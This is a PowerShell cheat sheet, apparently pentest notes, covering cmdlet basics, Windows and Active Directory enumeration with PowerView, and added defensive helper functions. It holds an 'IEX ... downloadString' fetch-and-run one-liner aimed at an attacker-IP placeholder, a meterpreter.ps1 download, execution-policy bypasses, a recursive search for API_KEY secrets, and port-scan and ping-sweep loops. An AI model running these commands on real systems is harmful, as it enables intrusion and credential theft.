# PowerShell Usage

## Get-Help

```powershell
Get-Help Command-Name
```

* Show examples

```powershell
Get-Help Command-Name -Examples
```

* Get-Command lists all the cmdlets installed on the current computer.

```powershell
Get-Command
```

```powershell
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
```

## Passing Output via Pipe

* A pipe passes whole objects, including their methods and properties.

```powershell
Verb-Noun | Get-Member
```

```powershell
Get-Command | Get-Member -MemberType Method
```

## Creating Objects from Previous Cmdlets

```powershell
Get-ChildItem | Select-Object -Property Mode, Name
```

Useful Select-Object parameters:

* -First x - gets the first x objects
* -Last x - gets the last x objects
* -Unique - shows only the unique objects
* -Skip x - skips the first x objects

## Filtering Objects

```powershell
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
```

The second version uses the `$_` automatic variable, which holds the current object while Where-Object works through every object passed to it.

Here `-operator` is one of the following comparison operators:

* -Match: matches the exact value of the property
* -Contains: if any item in the property value is an exact match for the specified value
* -EQ: if the property value is the same as the specified value
* -GT: if the property value is greater than the specified value

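As an added example (not part of the original cheat sheet), the function below combines the script-block form of Where-Object, the comparison operators above, Select-Object-style object shaping and Sort-Object into one defender-side check: it lists the TCP ports a host is listening on together with the process that owns each one, so unexpected listeners stand out. It assumes a Windows host where Get-NetTCPConnection is available; the function name and its parameters are my own.

```powershell
function Get-ListeningPortOwner {
    # Lists listening TCP ports with the owning process (added example; name is hypothetical).
    param(
        [int]$MinPort = 0,          # skip ports below this number (assumed parameter)
        [string]$NamePattern = '.'  # regex the process name must match; '.' matches everything
    )

    # Build a process id -> name lookup once instead of calling Get-Process per port.
    $procs = @{}
    Get-Process | ForEach-Object { $procs[[int]$_.Id] = $_.ProcessName }

    Get-NetTCPConnection |
        # -eq compares the exact value; -gt is a numeric comparison on the port number.
        Where-Object { $_.State -eq 'Listen' -and $_.LocalPort -gt $MinPort } |
        ForEach-Object {
            # Shape a new object from the connection plus the process lookup.
            [PSCustomObject]@{
                LocalAddress = $_.LocalAddress
                LocalPort    = $_.LocalPort
                PID          = $_.OwningProcess
                Process      = $procs[[int]$_.OwningProcess]
            }
        } |
        # -match is a regular-expression match, so 'svc|host' would match both names.
        Where-Object { $_.Process -match $NamePattern } |
        Sort-Object -Property LocalPort, LocalAddress
}

# Example calls:
# Get-ListeningPortOwner                       # everything that is listening
# Get-ListeningPortOwner -MinPort 1024         # only high ports
# Get-ListeningPortOwner -NamePattern '^(powershell|pwsh|python)'  # interpreters that listen
```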
### Out-GridView

Pipe the output to a graphical window and filter it through the GUI.

```powershell
whatever | Out-GridView
```

## Sort Object

```powershell
Verb-Noun | Sort-Object
```

```powershell
Get-ChildItem | Sort-Object
```

## Finding a File

```powershell
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
```

```powershell
Get-HotFix | Format-List | findstr <searchstring>
```

```powershell
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
```

* Find backup files

```powershell
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErrorAction SilentlyContinue
```

* Find file contents

```powershell
Get-ChildItem -Path C:\* -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern API_KEY
```

## Showing File Content

```powershell
Get-Content 'C:\Program Files\interesting-file.txt'
```

* Indexing lines

```powershell
(Get-Content -Path file.txt)[index]
```

* Search

```powershell
Select-String <filename> -Pattern <pattern>
```

## Copy File Content

```powershell
Copy-Item <sourcefile> <destfile>
```

## Count Lines of Output

As an example, count all cmdlets on the system.

```powershell
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
```

## Count Words

```powershell
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
```

## Checksum of File

```powershell
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
```

## Current Working Directory

```powershell
Get-Location
```

## File Metadata

```powershell
ls | Format-List *
```

## Web Request

```powershell
Invoke-WebRequest -Uri 'http://<attacker-ip>' -OutFile <filename>
```

```powershell
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```

* Web request and execute in one go

```powershell
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
```

## Base64 Decode File

```powershell
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content -Raw .\Desktop\b64.txt)))
```

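The one-liner above assumes the decoded bytes are UTF-8, but base64 found in logs is often UTF-16LE (that is what `powershell -EncodedCommand` takes), which UTF-8 decoding renders with a NUL after every character. The added function below (not part of the original cheat sheet; its name and parameters are my own) cleans up whitespace and padding and picks the encoding from the byte pattern; the sample input at the end is constructed inline.

```powershell
function ConvertFrom-Base64Text {
    # Decodes a base64 string and picks UTF-16LE when the bytes look like it
    # (added example; hypothetical function name, not a built-in cmdlet).
    param(
        [Parameter(Mandatory)][string]$Base64,
        [switch]$AsUtf8   # skip the heuristic and always decode as UTF-8
    )

    # Strip whitespace and line breaks so a wrapped or multi-line blob still decodes.
    $clean = $Base64 -replace '\s', ''
    # Restore the '=' padding that some tools drop.
    if ($clean.Length % 4) { $clean += '=' * (4 - $clean.Length % 4) }

    $bytes = [System.Convert]::FromBase64String($clean)

    # UTF-16LE text made of ASCII characters has a NUL in every second byte; if at
    # least a third of the bytes are NUL, treat the data as UTF-16LE.
    $nulCount = @($bytes | Where-Object { $_ -eq 0 }).Count
    if (-not $AsUtf8 -and $bytes.Length -ge 2 -and $nulCount -ge ($bytes.Length / 3)) {
        return [System.Text.Encoding]::Unicode.GetString($bytes)
    }
    return [System.Text.Encoding]::UTF8.GetString($bytes)
}

# Decode a file like the one-liner above, tolerating multi-line content:
# ConvertFrom-Base64Text -Base64 (Get-Content -Raw .\Desktop\b64.txt)

# Constructed sample: 'Get-Process' encoded as UTF-16LE, the form used by
# "powershell -EncodedCommand ..." command lines.
$sample = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('Get-Process'))
ConvertFrom-Base64Text -Base64 $sample
```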
## Circumvent Execution Policy

```powershell
powershell -ExecutionPolicy Bypass -File .\<file>
```

```powershell
Set-ExecutionPolicy Bypass -Scope Process
```

## Enumeration

### Users

```powershell
Get-LocalUser
```

* Users for which no password is required

```powershell
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
```

* SIDs of users

```powershell
Get-WmiObject win32_useraccount | Select name, sid
```

### Network intel

* Connections

```powershell
netstat -ano
```

* IP address

```powershell
Get-NetIPAddress
```

* Count of listening TCP ports

```powershell
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
```

* TCP port by number

```powershell
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
```

### Patch level and updates

```powershell
Get-HotFix
```

* Find patch by HotFixID

```powershell
Get-HotFix | Where-Object -Property HotFixID -Match KB124284
```

```powershell
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

### Drivers

```powershell
driverquery
```

### Processes

* Start processes

```powershell
Start-Process <process>
```

* Running processes

```powershell
Get-Process <process>
```

### Scheduled tasks

```powershell
schtasks /query /fo LIST /v
```

```powershell
Get-ScheduledTaskInfo
```

* Scheduled tasks, by TaskName

```powershell
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
```

or

```powershell
Get-ScheduledTask -TaskName taskname
```

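Looking a task up by name tells you it exists; when reviewing a host for persistence you also want what each task actually executes and as whom. The added function below (not from the original cheat sheet; the name and the -SkipMicrosoft switch are my own) flattens each task's actions into one row per action, using the Get-ScheduledTask objects shown above.

```powershell
function Get-ScheduledTaskCommand {
    # Lists every scheduled task with the executable and arguments it runs, the account
    # it runs as, and its state (added example; hypothetical function name).
    param(
        [switch]$SkipMicrosoft   # hide the many built-in \Microsoft\ tasks to reduce noise
    )

    Get-ScheduledTask |
        Where-Object { -not ($SkipMicrosoft -and $_.TaskPath -like '\Microsoft\*') } |
        ForEach-Object {
            $task = $_
            # A task can carry several actions; emit one row per action.
            foreach ($action in $task.Actions) {
                [PSCustomObject]@{
                    TaskName  = $task.TaskName
                    TaskPath  = $task.TaskPath
                    State     = $task.State
                    RunAs     = $task.Principal.UserId
                    Execute   = $action.Execute     # $null for non-exec actions (COM handlers)
                    Arguments = $action.Arguments
                }
            }
        }
}

# Tasks that launch an interpreter, which deserve a closer look in a persistence review:
# Get-ScheduledTaskCommand -SkipMicrosoft |
#     Where-Object { $_.Execute -match 'powershell|pwsh|cmd\.exe|wscript|cscript|mshta' }
```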
### Alternate Data Streams (ADS)

* Show ADS

```powershell
Get-Item -Path file.exe -Stream *
```

* Open ADS

```powershell
wmic process call create $(Resolve-Path file.exe:streamname)
```

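Get-Item -Stream * inspects one file at a time; the added function below (not part of the original cheat sheet; its name and the -IncludeZoneId switch are my own) walks a directory tree and reports every file that carries a stream other than the default `:$DATA`, and reads the Zone.Identifier stream, which records where a downloaded file came from.

```powershell
function Find-AlternateDataStream {
    # Reports files under $Path that have alternate data streams
    # (added example; hypothetical function name).
    param(
        [Parameter(Mandatory)][string]$Path,
        [switch]$IncludeZoneId   # also list the common Zone.Identifier (mark-of-the-web) stream
    )

    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            Get-Item -Path $file.FullName -Stream * -ErrorAction SilentlyContinue |
                # ':$DATA' is the normal file content; everything else is an alternate stream.
                Where-Object { $_.Stream -ne ':$DATA' } |
                Where-Object { $IncludeZoneId -or $_.Stream -ne 'Zone.Identifier' } |
                ForEach-Object {
                    $zone = $null
                    if ($_.Stream -eq 'Zone.Identifier') {
                        # Zone.Identifier holds the security zone and often the source URL.
                        $zone = (Get-Content -Path $file.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue) -join ' '
                    }
                    [PSCustomObject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Length = $_.Length
                        Zone   = $zone
                    }
                }
        }
}

# Find-AlternateDataStream -Path $env:USERPROFILE\Downloads -IncludeZoneId
```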
### Export Output

* Export as CSV

```powershell
Get-Process <process> | Export-Csv <output.csv>
```

### ACL

* Owner of a file or directory

```powershell
Get-Acl C:\
```

### Port Scanner

```powershell
for($i=1; $i -le 65535; $i++) { Test-NetConnection localhost -Port $i }
```

### Ping Hosts

```powershell
1..15 | %{ echo "10.0.2.$_"; ping -n 1 "10.0.2.$_" | Select-String ttl }
```

### Antivirus

```powershell
sc.exe query windefend
```

* Service name unknown

```powershell
sc.exe queryex type= service
```

Inside PowerShell, `sc` alone is an alias for Set-Content, so the Service Control tool has to be called as `sc.exe`.

### Using PowerView

```powershell
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
```

* Enumerate Group Policy

```powershell
Get-NetGPO
```

* Trust relationship to other domains

```powershell
Get-NetDomainTrust
```

* User enumeration

```powershell
Find-LocalAdminAccess
```

```powershell
whoami /priv
```

```powershell
Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership
```

### Services

List services that are running, or stopped but started automatically after a reboot, in the following way (Get-Service objects expose the service state as `Status`):

```powershell
Get-Service | Where-Object {$_.Status -eq "Running" -and $_.StartType -eq "Automatic"}
Get-Service | Where-Object {$_.Status -eq "Stopped" -and $_.StartType -eq "Automatic"}
```
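As an added example (not from the original cheat sheet; the function name and its -OnlyStopped switch are my own), the report below extends the two filters above: it uses the Win32_Service class, whose objects expose `State`, `StartMode`, the service account (`StartName`) and the binary path, and flags automatic services that are not running as well as ones running under a custom account.

```powershell
function Get-AutoStartServiceReport {
    # Reports automatic-start services, flagging those that are not running and those
    # that run under a non-built-in account (added example; hypothetical function name).
    param(
        [switch]$OnlyStopped   # limit the output to automatic services that are not running
    )

    Get-CimInstance -ClassName Win32_Service |
        # Win32_Service StartMode values: Boot, System, Auto, Manual, Disabled.
        Where-Object { $_.StartMode -eq 'Auto' } |
        ForEach-Object {
            $flags = @()
            if ($_.State -ne 'Running') { $flags += 'auto-start but not running' }
            # LocalSystem, NT AUTHORITY\* and NT SERVICE\* are built-in; anything else
            # is a named user or domain account and worth confirming.
            if ($_.StartName -and $_.StartName -notmatch '^(LocalSystem|NT AUTHORITY\\|NT SERVICE\\)') {
                $flags += 'custom account'
            }
            [PSCustomObject]@{
                Name      = $_.Name
                State     = $_.State
                StartMode = $_.StartMode
                RunsAs    = $_.StartName
                Path      = $_.PathName
                Flags     = $flags -join '; '
            }
        } |
        Where-Object { -not $OnlyStopped -or $_.State -ne 'Running' } |
        Sort-Object -Property State, Name
}

# Get-AutoStartServiceReport -OnlyStopped
```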